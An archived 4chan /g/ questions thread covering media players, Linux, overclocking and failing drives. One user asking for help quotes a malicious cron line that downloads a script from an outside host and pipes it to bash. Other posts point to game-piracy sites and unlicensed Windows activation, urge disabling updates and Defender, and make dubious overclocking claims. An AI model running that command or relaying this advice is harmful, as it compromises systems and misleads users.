[a / b / c / d / e / f / g / gif / h / hr / k / m / o / p / r / s / t / u / v / vg / vr / w / wg] [i / ic] [r9k / s4s / vip / qa] [cm / hm / lgbt / y] [3 / aco / adv / an / asp / bant / biz / cgl / ck / co / diy / fa / fit / gd / hc / his / int / jp / lit / mlp / mu / n / news / out / po / pol / qst / sci / soc / sp / tg / toy / trv / tv / vp / wsg / wsr / x] [Settings] [Home]
Board
Settings Home
/g/ - Technology

Thread archived.
You cannot reply anymore.

File: 676.gif (546 KB, 255x255)
546 KB
546 KB GIF
The smiley with a carat nose edition
>>
File: 1510480159924.png (238 KB, 561x352)
238 KB
238 KB PNG
Technologically speaking, is it possible to become 2D?
>>
How do people pick up expiring domains without auctions and ridiculous resellers pricing it for hundredss if not more? I hear people are able to pick them up but My experience involves being cockblocked by the auto renew or a domain reseller
>>
File: into_the_trash_you_go.jpg (166 KB, 1333x733)
166 KB
166 KB JPG
>>64289507
Yes, I know the perfect place to flatten trash like you.
>>
my little brother wants me to get him a videogame, so i checked piratebay but it's sparse in its vg uploads
are there any other vg resources?
>>
File: vlclogo.jpg (20 KB, 250x250)
20 KB
20 KB JPG
What media player is as good as or better than VLC?

I'm really disliking VLC lately because I can't click the screen to pause or no button to switch to next video or can't have webm thumbnails.

Not MPV though. It feels like a half-baked player. I don't want to have to edit text files just to get the video to repeat.
>>
>>64289645
skidrowreloaded, nosteam.
if you want fast download speeds use turkdown.com, google translate the website, sign in, follow instructions and click through the ads. it's worth it.
>>
>>64289646
mpc-hc is popular but is no longer being developed
>>
>>64289698
Yeah that was my previous player but since its abandonware I needed to switch to VLC
>>
File: 1515795778166.png (37 KB, 555x426)
37 KB
37 KB PNG
>forget google password
>would you like to try another way to sign in? well will send verification code via sms :^)
>get code
>doesn't tell you where to enter it
>google how to use it
>all results say it's for two step verification and you have to enter it AFTER you enter your password
>>
>>64289645
kickass dot cd
>>
>>64289664
ok
i'm just checking out skidrow since it seems to be the most straightforward to use
there's no magnet link, only torrent?

>>64289733
this just seems to be a less functional piratebay
same content except with a broken layout
i'm clicking the comments button and nothing happens
>>
What is the point of an audio interface?

What AI would you recommend?
>>
>>64289545
>>64289545
>>64289545
>>64289545
????? Anyone
>>
>>64289723
...why?
You miiight consider switching a year or two down the line when VLC adds some new feature or support for a newly-created format that MPC will never get. But if current-VLC is worse than current-MPC, stick with MPC.
>>
>>64289768
is working on my side, also check
fitgirl-repacks dot site
>>
>>64289788
because MPC can't handle newer filetypes 100% sometimes webms and mp4s are corrupted yet VLC can play them. also it doesn't feel as native on windows 10
>>
>>64289801
umatrix seems to be blocking the comments on fitgirl, that's the only issue with it
the domain "referrer dot disqus dot com" is blacklisted
>>
File: 1426043185221.jpg (37 KB, 220x588)
37 KB
37 KB JPG
Buying some case fans soon. At effectively identical prices, who's more trustworthy, Amazon or Newegg? Both are pretty solid obviously, but which one packages stuff better so it comes in one piece, and doesn't fuck me over on returns in the case it doesn't?
>>
>>64290516
Amazon has much better return policies than Newegg
>>
i need something to edit videos with so i can whip up some halfassed memes to sate my autism
>>
>>64290637
avisynth and ffmpeg
if your editing isn't entirely done on the command line or in a text editor, you're a filthy casual
>>
Is it bad to drink coffee when I have the flu?

Got this headache that won't go away so I'm kinda tempted.
>>
is it possible to download apps on ios11 without creating an apple id?
>>
>>64289724
google's account recovery system is so retarded it is actually mind boggling
>>
>>64290813
I don't think so.

Though I've never really owned an iPhone and only occasionally helped friends/relatives troubleshoot on them so I could be wrong.
>>
How much CPU usage will be reduced if i got a GTX 1050Ti to play 4K VP9 content?
>>
What is the difference between windows 10 ltsb and windows 10 ltsb n
>>
>>64290522
Amazon it is, then. Thanks mate.
>>
>>64290810
i drink coffee when i have the flu all the time just usually less than normal. for instance if i typically drink 20 fl oz. of coffee a day, i will drink 10 fl. oz of coffee a day when i am sick.

maybe its broscience but i feel like avoiding caffeine entirely would just upset your body and make recovery more difficult. in my uneducated opinion its fine to give your body its caffeine fix but dont drink an excessive amount. just drink lots of water.
>>
File: private ptsd.jpg (25 KB, 749x537)
25 KB
25 KB JPG
I recently built a computer and I'm running it on windows 7 because my build has an R5 1600 and it was very easy to boot it up with this
https://pastebin.com/TUZvnmy1

However, I'm starting to realize I don't like w7.
How hard is it to switch to a linux OS?
Are compatibility issues with vidya and programs (such as adobe premiere) a real thing or just memes to scare away novices?
Where should I go to start looking at which linux OS suits me best and how to switch to it?
>>
>>64291176
>Are compatibility issues with vidya and programs (such as adobe premiere) a real thing
Yes. In many cases, it can be worked around, but that ranges from minor nuisance to major pain in the ass depending on the program. If you're comfortable installing an OS on your own, though, I'd say give it a shot. Back up your shit and switch over to Linux full-time for a bit. See if you can get your stuff working to a satisfactory level. If it doesn't pan out, no big deal, just install a fresh copy of W7 and you're back in business.
>Where should I go to start looking at which linux OS suits me best and how to switch to it?
Personally, I like Manjaro. Other than that, Xubuntu is a solid choice.
>>
>>64290972
All versions of windows have a european "N" edition. They're just like their normal counterparts except that they cut out a couple minor things to comply with european anti-competitive law. Main thing is no media player.
>>
What else besides a spoofed User Agent field do I need to wget off of nhentai.net? I know that the image serving domain i.nhentai.net isn't blocked off entirely as I can get to the image directly in browser, but using the same UA as my browser through wget, I still get the 403 forbidden error, telling me it's checking for something else as well.

What would that be?
>>
>>64290810
>>64291113
>just drink lots of water.
Best advice you will ever recieve from anyone on this website ever
>>
>>64291176
install gentoo
But seriously, if you can work with computers at all you could install arch.
>>
What's rufus equivalent on Linux that's not dd?
>>
File: imfuckedright.png (21 KB, 689x173)
21 KB
21 KB PNG
So I'm thinking my ssd just failed (it won't boot anymore although it is being detected by my bios however windows doesn't detect it in disc management or when I try to reformat it)

Now I've checked the health of this hard drive, give it to me straight. How fucked am I? Can I do something or is replacement soon the only answer?
>>
>>64291373
Well, I haven't really installed OS's on my own before besides the one I just did, and that was basically baby-mode, I just let the rufus program set up my USB and then it did its work as soon as I left the BIOS. I suppose I can try though, I've got my stuff still backed up on my old computer.

>>64291520
I do well with computers usually, but I've never done anything outside of windows in the past, and the most I've ever done computer-wise is html and javascript. Looking at linux now, everything seems a bit overwhelming.
>>
File: 1508117637489.png (48 KB, 1458x740)
48 KB
48 KB PNG
>>64289460
Why does 4chan X/StyleChan keep messing up like this sometimes if I load the page? I'm using FF Quantum.
>>
>>64291605
Dat uncorrectable is pretty bad. I'd check your warentee and see what's covered.
>>
File: file.png (61 KB, 659x583)
61 KB
61 KB PNG
should I be worried?
>>
>>64291801
obviously
>>
>>64291839
what should I do I don't want to reinstall windows 10 again and I can't install windows 7 because it's kabylel
>>
My CPU is quite weak so my best option for streaming is using the videocard with the Shadowplay/Share streaming thing.

But this doesnt give me nearly enough options for streaming
Is there any way of using my videocard for streaming without having to use shitty geforce experience?
>>
>>64291801
check if windows defender is scanning
>>
>>64291892
nope
>>
What is bitcoin mining?

Where does the money come from?

I got really high on amphetamines and started thinking bitcoin miners are secretly a covert method of ai deep learning run by google and apple the most evil corporations known to man and thats why its getting more and more difficult to mine bitcoin. Probably not 100% accurate but the question still stands.
>>
>>64292042
>Where does the money come from?
Nowhere, it's an illusion. Bitcoins only have value because people think they have value. Kind of like USD, except it isn't even backed by a state.
>>
>>64292042
Most bitcoin mining software is open source, so you can look at that if you really need to know. The gist of it is that it solves complex hashing problems (not really anything malicious there).

Ideally, Bitcoin IS the money, but we know that isn't really true. The only value bitcoin has comes from people who buy into it thinking the value will only go up. Pretty much everyone gave up on the idea of Bitcoin as currency last year, and it still upsets me.
>>
>>64292042
>Probably not 100% accurate
You are too high. It is difficult to mine because it is supposed to be. Mining doesn't "create" the coins, they are produced as a reward for being a node for the blockchain. The mining workload is designed to reward less per unit of workload as the overall network has more work done in it. The point is that no one person can be a disproportionately large part of the network, so they can't take over it.

The value of the coins is whatever people can get from them, the same as with any currency. If tomorrow everyone decided bitcoin was worthless, it would be worthless.
>>
>>64292145
yep, the reason "USD$10" is worth what it's worth is because other people consider it so
the reason people accept any form of money is because they're assured they will get the same value from it as you did
it's not like the $10 note itself literally cost $10 to manufacture, it's value is based on other factors, which can change
>>
>>64289645
igg-games is a good one. So is oceanofgames
>>
Where can I get the Office 2016 without signing?
>>
File: ads.png (89 KB, 767x113)
89 KB
89 KB PNG
How do i block these from pi-hole?
>>
File: 1515153215174.gif (140 KB, 379x440)
140 KB
140 KB GIF
I want to install w10 to my sister's laptop. Should I go straight installing w10 with kms toolkit or would I be better upgrading from win7 to get permanent license?
>>
>>64292458
Better to have a license. That way you don't have to worry about MS or the KMS people being dicks in the future.
>>
Can I use a headphone splitter to merge 2 incoming signals into one for my speakers?
Wouldn't it potentially cause damage if one of the 2 devices creating audio is turned off, and then gets current in over the audio port from the other device?
>>
Are 40mm fans any good? I'm thinking of buying one to cool the VRM heatsink
>>
>>64292445
forgot to change my DNS, nvm
>>
Is it at all feasible to attempt to repair a broken graphics card, or would one need training in that kind of thing to even have a chance of success?
>>
>>64292559
Shoving them in the oven to "reflow" the joints used to be a thing, and capacitors can be replaced in some cases, so minimal repair attempts can be made
>>
File: IMG-20170728-WA0018.jpg (41 KB, 651x661)
41 KB
41 KB JPG
Whenever i start up my computer my stomach usually gets upset and two minutes in i get diarrhea and headaches followed by a really weak feeling, ocassionally i throw up whatever i ate within two hours prior.
When i drink a half liter bottle of vodka under an hour and then boot up the computer i usually don't feel any different from normal but i get a sudden urge to cook a vegetarian meal and repair my broken stove.
Why is it like this?
>>
>>64292493
I can use any version of win7, right? Hope I still got my old installer.
>>
>>64292577
>used to be a thing
Why isn't it still? Does it not work on newer graphics cards?
>capacitors can be replaced in some cases
If I don't see any parts of the card that are obviously burned out, would I just have to replace all the capacitors?
>>
>>64292578
Conditioned yourself to drink vodka when you boot computer
>>
>>64292581
Yes, but you need pro or ultimate if you want win10 to be pro.

http://pastebin.com/4LvsAFk7
>>
>>64292592
If the capacitors have no obvious faults then it's probably not the caps, I'm saying it used to be a thing because my information is a tad dated and I assume modern GPUs are more sensitive than older ones, just google GPU oven reflow, it is absolute last resort though.
>>
what do i use my raspberry pi for?
I already have a server with nextcloud and mail on it.

Any good uses you guys have for it? Pi-Hole?
>>
>>64292627
https://www.google.com/search?q=what+do+i+use+my+raspberry+pi+for
>>
>>64292042
ah, you're that type of drug user..
>>
how do build clover apk?
https://github.com/Floens/Clover/wiki/Building-Clover
I got the apk but it crashes the moment I run it
>>
>>64292639
:DD
you forgot lmgtfy.com memeboy
>>
File: IMG-20170905-WA0057.jpg (5 KB, 212x72)
5 KB
5 KB JPG
>>64292606
but what does it have to do with the meal and the broken stove when i boot up the computer, i usually dont return back to the computer until several days later with the same results every time and it feels like i'm wasting a lot of time on something that's not progressing anywhere.
I'm a smoker, does it have something to do with the brand of tobacco i smoke?
>>
>>64292669
I have no idea what you're talking about
>>
>>64292682
Most likely it's because when you start drinking, you'll feel nostalgia to your childhood ideals where everything was good.
Your current life is shit.
But you know how to live a life where your ideals can still be followed.
To support this life you need to eat healthy and want to fix what's broken.
While vegetarianism isn't necessarily always healthy, it does ease your mood about the globalised slaughter of animals
>>
File: '.jpg (34 KB, 804x640)
34 KB
34 KB JPG
>>64292746
Thank you for helping me you are right
>>
What's the difference between all the versions of Raspberry Pi's? I know some have high cpu clock speed, different number of cores, etc, but is there a point in buying the Pi 3 if I just want to run RetroPi on it? Or could I get a different, less expensive, Pi?
>>
>>64292774
Godspeed to you anon
>>
>>64289545
>>64289786
bump
>>
>>64292507
probably not, but you're super paranoid, you could place a diode in line
>>
>>64289460
file picker?

how?
Anybody have a link? I don't want KDE, I have gnome/gtk based gentoo
>>
Has there been a price drop because of used intel hardware flooding the market yet? I keep reading that companies might replace all their shit because spectre and meltdown.
>>
>>64291783

Hiro's new malware is incompatible with 4chanx.
>>
Why can power by keyboard be done only through ps/2 and not usb? I thought usb also gets sum voltage when rig is off.
>>
is it worth upgrading my i5 2400 to an i5 2500k for £60?
>>
File: 1512226453691.jpg (85 KB, 1024x806)
85 KB
85 KB JPG
My Sandisk 128GB micro sdcard snapped inside my tablet.
I just recently bought it a week ago, costed me around 50 europoints.
FUCK that's lots of money.
Can I still claim the warranty?
>>
File: carat nose flawless.gif (913 KB, 299x298)
913 KB
913 KB GIF
>>64293035
Somebody please help me getting a better file picker in xubuntu :^)

>>64293140
You need to multiply your RAM speed. E.g. if you have 1600 MHz DDR3 memory, it runs at 800MHz ('Double' Data Rate "scam"/"troll"). So multiply that with something like e.g. 4 to get 3.2 GHz.

Overclocking 101, don't bother with the web 2.0, they don't know jack shit anymore and need /g/sync as compensation in vidya etc.

ayy lmao
u mad?
>>
>>64293163
if 50 europoints is a lot of money to you, don't spend it on electronic toys
>>
>>64293117
It can, Apple Computer Inc. produced lot's of machines with that feature.
Apple Inc. is too imcompetent.
>>
>>64293170
I dont even understand what you're on about. They both use the same RAM.
>>
>>64293221
My gigabyte mobo says only ps/2 allowed, albeit I have not tried usb because I don't have usb keyboard.
>>
File: Moto-G-2013.jpg (840 KB, 1920x1280)
840 KB
840 KB JPG
My moto g has been running terrible, apps not working properly and crash.

Then I found out hot to clear the cache partition and it's running much better.

Any other less known tips to improve performance on old android phones?
>>
>>64293207
Ok, richfag.
But before I buy another one, can I still return it and get new one for free?
>>
File: 1514951570997.jpg (106 KB, 1600x1200)
106 KB
106 KB JPG
>>64293241
I run my stockspeed 3.3GHz 2500k at 3.2 GHz (sometimes at 4.0GHz because 800MHz * 5=4000MHz) right this moment, as it is faster like that. My RAM is running at 1600MHz (800MHz in reality, hence I explain it using these values, if you have other speeds adjust it accordingly). Try it using videogames or when scrolling up and down on a webpage using middle click slowly and watch out for microlags or microstuttering.
Yes, I am running 100MHz less than stock speed to get an even multiplier and enjoy higher/smoother speeds. Dunia engine in Far Cry series is an example where this behaviour is extreme. At stock speeds it's a shitfest of screen tearing, with 100MHz is buttery smooth.

I will not spoonfeed you at what clocks you need to set your PC. Get a scientific calculator and learn basic computing or buy a laptop.

Long story short: You can get a PC that seems quicker by reducing clockspeeds by a few percent. So maybe try simple maths first.
>>
>>64293317
with 100MHz less* fml
>>
>>64293317
That's all fine and dandy, something I'll look into IF I get it. My only question was is it still worth going from a i5 2400 to an i5 2500k...
>>
>>64293246
If battery performs bad, it's almost always an app being awake when it shouldn't be. Check battery/app stats. Factory reset of phone can solve this.
>>
>>64293342
Yeah, answer yourself by starting to calculate speeds and test results. 2400 can be underclocked.
>>
>>64293317
my 3.5GHz cpu gets a bit iffy past 3.9GHz
would it be worth bringing my ram down to 780MHz (3900/5) instead?
>>
>>64293368
It is definitely worth a try.
Protip: Make a photo with your smartphone from the BIOS with the current clocks, that way you can set it all back to what it was in case the results are shit.
It's basically riskfree and costs nothing, just a few minutes (or hours if you're a complete retard).
>>
>>64293404
as hinted, i've messed with overclocking already, though i'm by no means an expert
i know what settings i currently have, and my BIOS even has an option to save a few separate profiles, so keeping track of them is not a problem
>>
how do you guys run closed source botnet apps? like what if i want to play an absolutely proprietary game on linux, how do i sandbox it without running it in a vm
>>
>>64293353

battery is still really good as i'm not a heavy user

i wish they would make lite versions of apps for older phones, or make their apps modular, so you install the parts you actually use and leave the crap out
>>
>>64293442
firejail
i like to run things like proprietary games with firejail's private-home feature, where home folder access is directed into another folder, so they don't touch anything in my real home folder
and of course, disable everything the game doesn't need (like /dev access, or network access)
>>
I am thinking of using an HDMI splitter to connect both my PC and PS4 to my monitor which has only 1 HDMI port.

How do I know if the splitter adds lag? Lag is actually important to me. Apparently there are differents kinds of Splitters and they can present lag or not. Also I heard that there are differences between active and passive ones and one of these could cause problems, how do I know if the one I want to get is active or passive?
>>
>>64293442
>>64293467
ps. yes, wine works with firejail, and no, wine is not a sandbox
>>
Android OS

Does turning off auto update save battery, speed things up a bit?

I thought not having apps continually trying to update might free up some resources
>>
>>64293478
might save a small amount of bandwidth/power since it won't be periodically checking for updates
if you're willing to update manually in your own time, go for it
>>
>>64293477
cool ill try this out
>>
>>64293416
>>64293368
>>64293342
>>64293326
>>64293317
>>64293241
>>64293170
Geekbench has a new test that checks for this.
See pic related how my machine excels at that. 100MHz more on the CPU (3.3 GHz) and the bar would be as long as the others. Too lazy to show that now.

Benches aren't important though, important is if scrolling on webpages is smooth or ego shooters microstutter because the northbridge with the RAM and CPU run at odd unfitting speeds. Doing this is about real world images on the monitor, not the benches. But nowadays we even have proofs for the infidels that don't believe.

Please bear in mind that I did not close any apps except one video game I had running, scores might be better after a cold boot.
>>
>>64289646
bump for more answers
>>
when will windows 10 enterprise get meltdown and spectre patch?
>>
>>64293583
When all the valuable data has been extracted.
>>
>>64293530
well, i can't get my ram down to 780 without also bringing down the cpu a touch as well, defeating the point
i'm not sure if whatever this does would make up for bringing the cpu down to 3.6 from 3.9
i will try a bit more to get the cpu to 4.0
in the mean time, i've set the northbridge to 2.0 instead of 2.2, does make that a multiple matter?
>>
What's a good way to robustly store user data with electron programs?

In this case it would be something along the lines of:
-Dates
-Task name
-Total time spent

is it considered safe to store this type of thing in appData in a json file?
is there any foreseeable risk of data being lost by doing that?
>>
>>64293755
s/northbridge/hypertransport/
>>
>>64289460
how do i get wifi to work during a debian install i have tried the normal iso and net inst and cant get it to work i wanna set it up on my laptop but i have no ethernet port
>>
>>64293755
I cannot set my northbridge clocks speeds except over the PCI clock way which defaults to 100.

What RAM speeds do you have? What did the box say?
I take the RAM as baseline in my calculations and then try to get the CPU to a fitting clockspeed.
>>
>>64293786
Oh, then it's an AMD, right?
Post your RAM speed, I'm confused about your real RAM speed.
>>
What steps are needed to build an arch package?
>>
>>64289460
Question: I'm interested in learning Python, and I know it is rather easy to do. But the main question is, Will the python books currently available on Humble Bundle help me with my education or is it better for me to just go off some tutorials?
>>
>>64293812
get the iso with non-free drivers included

>>64293813
currently set to;
ram: 800 (DDR3-1600)
cpu: 4000
HT: 2000

>>64293831
yeah, amd. when i said 800MHz, i meant that. i'm aware that 800MHz = 1600MT/s
>>
>>64293839
I was wondering that myself
I think online tutorials are fine
>>
>>64293836
the official/manual way;
- download the package source (PKGBUILD and possibly other files)
- install build and package dependancies
- run "makepkg" in the package directory (where PKGBUILD is)
that's it, you can remove build dependencies now if you want

alternatively;
- install an "aur helper", such as pacaur
- use it like pacman (like "pacaur -S <aur package>")
that's it, it does the above for you
>>
>>64293906
So if I want to turn my own application into a package, all I need is an PKGBUILD and run makepkg?
>>
File: 393648106518085633.gif (106 KB, 56x56)
106 KB
106 KB GIF
>>64293831
>>64293813
>>64293755
I suspect choosing 2.0 instead of 2.2 would be the correct choice, yes.

A real good test is disabling hardware acceleration in Firefox (or chrome) and then pressing middle mouse button on a large site and scrolling up and down and looking for screen tearing and/or stuttering/microlags. Or Far Cry 3, it's perfect for this. Really. Source engine doesn't benefit in smoothness but in higher FPS.

>>64293843
>currently set to;
>ram: 800 (DDR3-1600)
>cpu: 4000
>HT: 2000
That looks really good already, yes!
HT could be at 2400 as well because 3*800, but dunno if that's stable for you? CPU would be 5*800 then. I do not know if the HT relates more to the RAM or CPU, I haven't oc an AMD yet (shame on me!).
I'm helping bcz curious.
At first it feels bad setting lower values I know that feel all too well, but the results speak for themselves.

I would be happy if I could at least teach one single person how its done. It's almost underground knowledge for some weird reason.
>>
For some reason my Windows 10 does not show thumbnail previews for .webm files.

How do you get it to display the thumbnail previews?
>>
>>64293944
yep, write a PKGBUILD, and run makepkg
that's it, really easy to make a package
submitting it to the AUR is pretty easy as well, make an account, make a srcinfo file (makepkg --printsrcinfo > .SRCINFO), do a git clone with the package name you want (gets made if it doesn't exist), then push it
read the arch wiki on details and conventions first
>>
>>64293946
well, before it was;
ram: 800
cpu: 3900
HT: 2200
those are just what i'm testing now
>>
>>64293980
Okay, thank you very much
>>
File: a.png (77 KB, 576x755)
77 KB
77 KB PNG
>>64293946
>>64294009
no fire yet
>>
File: 1515010175879.png (48 KB, 1400x900)
48 KB
48 KB PNG
>>64294009
Yeah, that's pretty bad and triggers my autism a bit.

It's simple once you understand the underlying issue.
When the numbers don't match, there's gaps that need to be filled by buffering and redistributing I/O that runs from CPU to chipset to RAM and vice versa.

This was mandatory knowledge to oc pentium IIIs and 4s, they wouldn't even boot if the clockspeeds didn't match as far as I know (I might be wrong on this one though, I was not into oc back then and have to believe what others told me in forums).

Good luck! And spread the word when you're convinced.

I'm now off to playing Dota 2 at roughly 120 FPS :3
>>
How the fuck do I properly calibrate a computer monitor?

I've become so autistic about settings I have no idea how something is supposed to look now or whether it's too bright or too dark.
>>
>>64294089
Based, it's even an octacore. Pretty neat.
Report back later, I'm interested.
>>
>>64294089
>>64294131
hmm, doesn't quite pass the testing, causes a few errors
will keep playing with different voltages, and i'll try 3.6GHz if need be (800*4.5)
>>
File: speed dial bullshit.jpg (16 KB, 412x316)
16 KB
16 KB JPG
How the FUCK do i get rid of this in the new Opera version? I already undocked the sidebar thing or how it's called
>>
>>64294178
I would go balls deep and 3.2. Want to know why? Been there, done that. I've tried it all between 4.4 and 3.2, tested days because I'm a nerd that had too much time and patience back then.
I'd rather have buttery smooth scrolling and nice vidya instead of ripping CDs or exporting video 10% quicker, but that depends of the personality and your workloads. I rarely need raw CPU power. And even a quad @3.2 GHz is fucking super fast.

For a number crunching machine (video editing station, server, mining rig or something that uses 100% CPU all the time) I would rather aim for the highest clock and not fitting multis.
>>
File: Untitled.png (1.4 MB, 1168x700)
1.4 MB
1.4 MB PNG
I've been getting artifacts in like 90% of my games and desktop sometimes. It's mostly when there is a lot of movement. I have a radeon 380 4gb. Is it dying? I haven't overclocked. This has also persisted after a complete reinstall and different drivers etc.
>>
File: Untitled.png (2.62 MB, 986x1343)
2.62 MB
2.62 MB PNG
>>64294329
Here is another example. It doesn't show up on screenshots.
>>
>>64294287
yea, 4.0 isn't happening
1.35v - locks up a several minutes in
1.36v - doesn't lock up, but causes a few errors
1.37v - kernel panics pretty quickly

i do quite a bit of video encoding and 3D rendering, but i do play games on this machine occasionally as well, so i'd rather 3.6 over 3.2 if it's still beneficial
>>
does anyone here works with Zabbix ? what resources other than the official docs did you use to learn it ?
>>
>>64294361
Get an even fatter cooler then.
Or 3.2. You could also sell RAM and get new quicker RAM.
For a few weeks I've also used some 1333 MHz RAM configuration with fitting multipliers, but the RAM speed was worth it lowering the CPU clock.
>>
How can I edit a few lines of a company's website? A freind offered me money to do it for him because I know some (basic) coding. Making the changes to the code won't be a big deal, but how the fuck do I access the code and save it in a way that site works with the changes?
>>
>>64294411
>Get an even fatter cooler then.
it's not overheating, i watch temperatures while testing
don't see how using 1333MT/s will be useful, since;
666.5*5 = 3332.5
666.5*6 = 3999
>>
>>64294412
>>
>>64294459
>>64294411
speaking of, my ram is supposed to be capable of 2133, and my mobo is supposed to be capable of 1866
i just have not had luck with those with the cpu at 3.9GHz, which i focused the most on
maybe i should try;
ram: 933 (1866)
cpu: 3732 (933*4)
>>
File: Santa.jpg (6 KB, 160x219)
6 KB
6 KB JPG
Can a japanese/english windows system screw up an instalation? I've been trying to install Oracle Database and the various path variables seems to be completly fucked.
>>
>>64294459
Yes, you're correct. Maybe it was 1800 or 1866, I definitely tried some other setting. Maybe it was even 1066Mhz or what that is, it's been a really long time.
>>
>>64294472
>log in
Where exactly?
>and upload the file with the changes
And this is absolutely safe?
>>
>>64294329
>>64294357
anyone?
>>
>>64294513
That looks fine to me, yes.

I've got 1600MHz memory (still without errors) that I've used for several years at 1800 MHz (my mainboard allows setting 1800 and 1866 with ivy bridge and only 1866mhz with sandy bridge, the ram only works with 1600 + 1800 for some unknown reason, 1866 doesn't). To be able to use it at those speeds I had to ramp up the RAM voltage by a lot(!), so maybe all you need is insane amounts of ram voltage to get it running at 1866?
>>
>>64294329
dying graphics card
>>
>>64294583
I've just noticed that it doesn't seem to be doing it on my second monitor which is fucking weird.
>>
>>64294609
some VRAM block on the PCB is kill then
>>
>accidentally leave laptop unlocked
>gf finds it and decides to explore my account
>finds my chan folder with all the /s/ and /d/ shit

What do
>>
>>64294412
phone the company and ask them for login details
>>
>>64293583
dont you have to set the av reg key?
>>
>>64294656
Convert her
Make her one of us
Otherwise she'll never understand
>>
>>64294576
still didn't like 1866, fails to even decompress linux (the very first thing the bootloader does)
not sure about overvolting ram...
anyway, i'm being pulled away for something, so i'll have to mess with this later
>>
>>64294703
Yeah that's essentially what I did
I told her the pics are for/from this site and she bought it
"Yeah your always on that site"

Getting texted pictures of random big tits women and morrigan sucking cock was frightening though... I never made this mistake before. Do I have alzheimers or something
>>
>>64294768
You know you're in once you get dickgirls
>>
File: stutter.webm (2.78 MB, 1280x720)
2.78 MB
2.78 MB WEBM
What is the name of this phenomenon? It happens when I try to play relatively demanding games and watch a video on my second monitor. My card is old and even for its time was crap (2GB 760), so I presume it's because of some resource shortage. I'd just like to know more about this.
>>
>>64294828
That's just the thing, I don't know what the fuck was on that computer, it's not my main computer it was just a laptop that had like 1/250th of my actual chan library.

I'm not sure if the dickgirls were there... Fuck I need to go the fuck home and assess the damage
>>
My old C2D is not vulnerable to the Intel exploits, but will I still suffer the performance hit after installing the Windows Updates meant to patch the vulnerability?
>>
Which is the best choice for $700 /g/

>Ryzen 3 1200 + GTX 1050Ti but I will use my current 768p monitor for the meantime
>A12 9800 + 1080p monitor then I wait for new Ryzen + new GPUs
>Used 2500k build + used 1060 3gb/970 3.5gb + 1080p monitor

these will all cost the same and I want to build next week because things aren't gonna look good if I wait™ (gaymen/photoshop)
>>
is the Surface Laptop any good?
>>
>>64289460
I have a small server at home running linux and I just discovered a process consuming 100% CPU that was mining fucking monero.

I also noticed the following on my user's crontab:
wget -q -0 lochjol.com/cmd2 2>/dev/null | bash;

I'm running a personal website using apache2 and ssh access is restricted to key authentication only.

Any idea how the fuck this could've happened?
>>
>>64294692
What? I thought this patch was pushed to everyone, regardless of edition, apart from the ones who have disabled updates?
>>
File: 1494637522062.png (450 KB, 1000x1000)
450 KB
450 KB PNG
I recent switched from a 1080p monitor to a 1440p with g-sync. Every time the monitor goes to sleep mode it resizes my windows to the top left and makes them small. I've tried deleting old HKEY_CURRENT_CONFIG or editing in regedit, but to no avail.
>>
>>64295049
Not unless you have an antivirus.
>>
>>64295070
I do not have one installed and MS defender is disabled.
>>
>>64295089
Then if you don't manually edit your registry, you will not receive any security updates in the near future. You also download them manually if you want.
>>
File: 1498613162919.jpg (220 KB, 1201x1325)
220 KB
220 KB JPG
>>64294848
There weren't many images there, just this and the morrigan
Thank fucking god, if it was my real 4chan folder I'd be fucked
>>
>>64294656
kys yourself to peaces degenerate scum
>>
>>64294533

depends on how the site is built.

you might need to ftp log in details to download the page, modify, then, re upload

or if the site uses a content managment system like wordpress, you'll need the log in details for that.
>>
>>64295172
You forgot the "unvirgin"
>>
>>64291783
Update your ublock filters.
>>
guys>>64295019
>>
>>64293970
Try this.
http://www.majorgeeks.com/files/details/icaros.html
>>
File: 1505731774393.png (25 KB, 425x565)
25 KB
25 KB PNG
>>64295338
I just enabled everything in the pic and hit update list. That will fix it?
>>
Could someone recommend me good cheap ass but reliable laptop under $500?
I only use it for code, and if it possible I want it to be new, not used.
>>
>>64289460
Hey /sqt/ today I finally upgraded to an SSD and want to install Windows 10 and Loonix. Does anybody have the Pastebin link with all the goodies/instructions for 10, and can somebody recommend a good distro for a Loonix semi-noob?

>>64289548
That machine makes me feel things...
>>
>>64295427
Should be. If it doesn't, try to purge the purge the cache of your 3rd party filters and re-update.
>>
File: 1484636652411.gif (12 KB, 250x242)
12 KB
12 KB GIF
a few days ago my sister knocked out the surge protector cord and in an attempt to get it plugged in, sent power to the pc 8~ times before finally getting it into the socket.
now when i try to play a game, the gpu stops displaying while sound plays in the background, forcing me to reboot.

could this be the psu or gpu??
>>
redpill me on umatrix
>>
>>64295514
Check your PSU first. Buy a PSU tester or borrow one of at least equivalent wattage.
>>
>>64295514
Speccy>Motherboard>Voltages
>>
>>64295529
Better version of noscript.
Different purpose than uBlock Origin, works better but its also harder to use since it usually blocks everything by default and you have to set sites manually.
>>
>>64295514
is your sister cute
>>
>>64295553
seconding
>>
File: Untitled.jpg (207 KB, 685x726)
207 KB
207 KB JPG
pls no bully, not really too tech inclined here. Based on pic related, how bad is my hard drive situation? Is it something that I'm going to replace soon?
>>
>>64295458
Download W10 LTSB.
Open Group Policy, disable Windows updates, data collection(Telemetry) and windows defender.

Linux Mint.
>>
Can anyone recommend a good Firefox addon that simply displays the date and time. I feel like I'm taking crazy pills cause all the recommended ones in their clocks section are terrible.
>>
>>64295571
Hope you got your shit backed up. If not you better do it, and maybe buy a spare drive, that day is coming soon.
>>
>>64295571
Function>Advanced Features>Raw Values>DEC
Post a screenshot again.
Anyway the reallocated sector is too high.
>>
>>64295455
Please, I'm a student, I'm starting my internship next month and that's all the money I have.
>>
File: 1513288369003.png (4 KB, 220x112)
4 KB
4 KB PNG
>>64295535
wouldn't i need to be running something to get any use out of this?

>>64295553
>>64295564
no
>>
>>64295421
>>64293970
is there a way to fix it without installing third party shit?
>>
>>64295599
A X220 or T420 thinkpad for $200.
You get a I5, 4 or 8GB RAM and a nice battery life.
X230 is an option too.
>>
>>64295613
no
>>
>>64295603
Look for 12+, 5+ and 3.3+.
>>
How can I play sound from one program through my speakers and another program through my headphones? Currently I have both plugged in and both play the same sounds
>>
File: Untitled2.jpg (184 KB, 687x723)
184 KB
184 KB JPG
>>64295591
Fortunately I do.

>>64295597
Here you go. I appreciate the help.
>>
>>64295633
i have no clue what you mean by that.
>>
File: 1510500524962.png (429 B, 55x28)
429 B
429 B PNG
Did they remove the multiple selection tick-box from 4chan? Did I accidentally disable it in 4chan X or something? I don't see it anymore, nor do I see the options on the bottom of the page like 'Delete post" or "Report."
>>
>>64295641
Your HDD SMART better be corrupt.
Otherwise i am surprised a HDD can have that amount of reallocated sectors.

Reallocated sectors means sectors that were damaged and removed from use.
